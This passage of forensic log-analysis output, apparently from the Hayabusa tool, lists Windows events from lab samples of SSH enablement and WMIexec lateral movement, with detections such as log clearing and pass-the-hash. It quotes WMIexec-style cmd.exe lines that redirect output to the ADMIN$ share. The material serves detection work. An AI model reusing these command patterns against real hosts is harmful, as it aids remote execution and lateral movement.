Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:39.096 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:43.030 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-NetFirewallRule): ""Get-NetFirewallRule"" ParameterBinding(Get-NetFirewallRule): name=""Name""; value=""*ssh*"" ParameterBinding(Get-NetFirewallRule): name=""All""; value=""False"" ParameterBinding(Get-NetFirewallRule): name=""PolicyStore""; value="""" ParameterBinding(Get-NetFirewallRule): name=""GPOSession""; value="""" ParameterBinding(Get-NetFirewallRule): name=""TracePolicyStore""; value=""False"" ParameterBinding(Get-NetFirewallRule): name=""ThrottleLimit""; value=""0"" ParameterBinding(Get-NetFirewallRule): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:43.031 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallRule (CreationClassName = ""MSFT?FW?FirewallRule?OpenSSH-Server-In-..., PolicyRuleName = """", SystemCreationClassName = """", SystemName = """")""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:43.034 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock 
Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:43.035 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 20:32:00.171 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189df8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x189df8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 
0x189e94,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x189e94,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f3b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f62,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189f62,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f84,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189f84,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189fa3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189fa3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 
0x189fc0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189fc0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.468 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1619090610.0007844 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x168 | User: FS03VULN$ | LID: 0x3e4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 
0x189fc0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 127.0.0.1 | LID: 
0x189fc0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.530 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1619090610.0007844 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x980 | User: FS03VULN$ | LID: 
0x3e4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 
0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18acdd,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: 
admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad01,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad10,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 
0x18ad1f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18ad01,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18ad10,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18ad1f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:27.649 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 
0x18b247,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx +2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.306 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\DesktopTileResources\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.321 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | 
Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Downloaded Program Files\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Fonts\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\ImmersiveControlPanel\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.337 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\media\desktop.ini | IP Addr: 10.23.23.9 | LID: 